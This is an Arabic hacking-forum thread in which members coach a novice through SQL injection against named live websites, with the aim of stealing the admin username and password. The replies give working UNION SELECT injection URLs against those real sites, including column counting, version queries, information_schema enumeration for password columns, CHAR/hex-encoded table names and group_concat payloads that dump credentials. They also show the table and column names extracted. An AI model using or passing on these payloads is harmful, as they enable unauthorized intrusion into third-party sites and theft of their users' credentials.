![]() |
الى الاخ هون أرعص يسم الله الرحمن الرحيم السلام عليكم ورحمه الله وبركاته الا يا الغالي أنا سويت مثل ما قلت ذهبت الى موقع مصاب وظعت علامه ' وضهر الخطأ بعدها أظفت قبل المتغير علامه - وبعدها أظفت -- Union Select 1,2,3,4,5 حتى وصلت الى عدد الاعمدهـ وطلع لي بالعنوان رقم 3 أنا أبغى أطلع اليوزر والباس تقدر تفيدني وجزاك الله الف خير علما اني جر بت أحط يوزر وباسبورد بالانجليزي يطلع خطا smilies3 |
تابع دورة الاخ فوكانو ------------------------------- طيب جرب الامر هذا @@version لمعرفه اصدار القاعدة ! ورد لي خبر على شان بقدر اساعدك @! |
يا الغالي أنا فهمت الطريقه وطبقت الاوامر لاكن المشكله عمود الباسبورد وعمود اليوزر ما عم تطلع أول شيء http://www.cdvdcenter.com/zcat.php?id=-1 Union Select 1,2,3,4,5,6,7,8,9 - بعدين طلع العمود المصاب موب بالصفحه في لب الصفحه في العنوان يعني بعدين طلعنا عمود اليوزر طلع cdvdcenter.com:.member:id:sidividice_cdvd يعني id طيب pass عمود الباس التطبيق راح يكون كذا http://www.cdvdcenter.com/zcat.php?id=-1 Union Select 1,2, Concat(id,0x3a,pass),4,5+from+member -- بس ما طلع شيء لا يوزر ولا باس وش الحل ؟ ومشكور |
الحقيقه الي طلعت عندي عدد الأعمدة 5 وليست 9 ! والعمود المصاب ما ظهر يطلع لي The used SELECT statements have a different number of columns لعلى وعسى أن تكون مرقعة |
صح يا الغالي 5 أعمده لاكن أنا نسختها بهدف وصول الفكرهـ |
[align=right]ركزو بذي وشوفو وش المشكله أول شيء http://www.arzuntarin.com/zcat.php?id=-1 ^ موقع مصاب بالعمود 3 له خمس أعمده http://www.arzuntarin.com/zcat.php?id=-1 UNION SELECT 1,2,3,4,5 أول شيء نطلع الاصدار طلع 5 بعدين نحط الاوامر ع الرابط كذا http://www.arzuntarin.com/zcat.php?i...schema.columns بعدين نحط الامر نظيف الامر (where+column_name+LIKE+CHAR(37, 112, 97, 115, 37 طلع لنا .: Arzuntarin.com - user:pass:arzuntarin_new :. طيب نطبق الامر الثاني where+table_name = 0x75736572 طلع لنا .: Arzuntarin.com - user:id:arzuntarin_new :. حطينا http://www.arzuntarin.com/zcat.php?i...ema.columns%20 في مشكله أو لا [/align] |
أهلا أخي الكريم بك معنا مشكلتك بسيطة و سببها عدم التركيز كباقي أصدقائك المهم...! راح أشرح لك المشكلة و أعطيك الحقنة الصحيحة أنت في الأخير وضعت هكذا : كود: http://www.arzuntarin.com/zcat.php?id=-1%20UNION%20SELECT%201,2,Concat%28id,0x3a,pass%29,4,5+from+information_schema.columns يعني نسيت أن تضع FROM+xxx مثلا في هذه الحالة نضع FROM+USER في آخر الحقنة المهم...! الآن ! حتى لو نضع هذا سوف يظهر رقم 1 و الباس و بالتأكيد الرقم 1 ليس اليوزر لأنه الـ ID لذلك سوف نرجع شوي في الحقنة و نضع الأمر group_concat() و من الأمر سوف نستنتج أن إسمع عمود الـ USER هو USER يعني الحقنة الأخيرة و التامة و النظيفة هذه هي : كود: http://www.arzuntarin.com/zcat.php?id=-1%20union%20select%201,2,concat%28id,0x3a,user,0x3a,pass%29,4,5+from+user-- و بدي أعطيك نصيحة ( أعد مشاهدة الدروس من أول درس ) بالتوفيق |
لحضه اخي الغالي لا تستعجل انت لخبط كثير كثيرر .. الحين اشرحها لك . |
اولا. شوف الرد على استفسارك هذا يمكن تعرف الخطــأ الي سويته .. http://www.vbspiders.com/vb/t32714.html |
يعطيكم ربي الف عافيه ، |
نبدا.: عدد االاعمدة المصابه .: 5 نوع اصدار قاعدة البيانات .: 5 http://www.cdvdcenter.com/zcat.php?i...on%28%29,4,5-- شوف الخطـأ طلع لك فووق في راس الصفحه في التوتيل .. تمام .. الان لحظ جداول الباسورد في هذا الرابط ...: http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- member:pass:sidividice_cdvd user:pass:sidividice_cdvd لو تلاحط اني اضفت امر . group_ قبل كلمه ..Concat ؛ << في الحقنه .. شوف الرابط الي فوق تبع الاستفسار الاول تبعك وبتعرف وش اقصد ..بإمر group_ لان هذا الامر بستخرج لك جميع الجداول .. نتابع الحقنه .: الان ناخذ من جداول الباسورد الي فوق ..ناخذ عمود user ونشفره ..بموقع .: http://www.waraxe.us/sql-char-encoder.html بعد التشفير بكون هيك الامر كامل في الموقع .: http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+table_name=0x75736572-- وهذه الاعمدة تبع اليوزر .: user:id:sidividice_cdvd user:user:sidividice_cdvd user:pass:sidividice_cdvd لاحظ في الرابط فوق تبع الحقنه يوجد امر group_ >> !! قلت لك الامر يجب في اي حقنه تستخدمه لكي تعرف الجداول .. نكمل الان ونستخرج معلومات صاحب الموقع .: لاحظ هنا الرابط .: http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user-- سوف تجد اليوزر والباسورد تبع الموقع .. لكن اليوزر لم يظهر لم اعرف لماذا .. لكن اذا لم يظهر اذهب الى اعمدت الباسورد ..: member:pass:sidividice_cdvd وشفر كلمه member .. لان احنا فوق شفرنا كلمت user لكن لم يظهر اليوزر والباسورد معنا . الان شفر كلمه memder وإن شاء الله يظهر معااك .. اليوزر والباسورد . ملاحظــــة .: لو تلاحظ في الرابط هذا تبعك ..: http://www.arzuntarin.com/zcat.php?i...schema.columns شوف خطــأ كبير عملته ياغالي .. وهو انك جعلت امر information_schema.columns بعد كلمه from وهكذا سوف يأتيك خطأ في الرابط .. والصحيح هو اضافه بعد كلمت from عند استخراج اليوزر والباسورد .. تضع بعد كلمه from الاسم الذي شفرته في موقع .: http://www.waraxe.us/sql-char-encoder.html شوف الرابط الصحيح هنا .. http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user-- هكذا انا اقصد .. إن شاء الله انك فهمتني وانا عارف انك لخبطت كثيررر وإحنا كنا مثلك نلخبط. لكن ارجع اقولك ،، لا تستعجل في تحميل الدروس او الدورة كامله .. في اليوم حمل درس .. وتابعه زيين زيين وطبق ... واذا لم يضبط معك موقع [ ضعه جانبأآ في مفكره ] واستخدم موقع اخر .. وهكذا . وإن شاء الله تحترف اخي الغالي ... ملاحضـــة ايضــأ. : ركز جيدأأ في الاوامر . الي بالحقن .. عشان تعرف كيف تستخرج اليوزر والباسورد. تحياتي لك .. اخوك .: Dr.NaNo بالتوفيق لك . اخي الغالي . |
مشطورين وما تقصرون الشغل خطا حقي الحمد لله فهمت الفكرهـ يا حباني وربي وفيتكم وكفيتم لكم تحياتي |
الساعة الآن 09:27 AM |
[ vBspiders.Com Network ]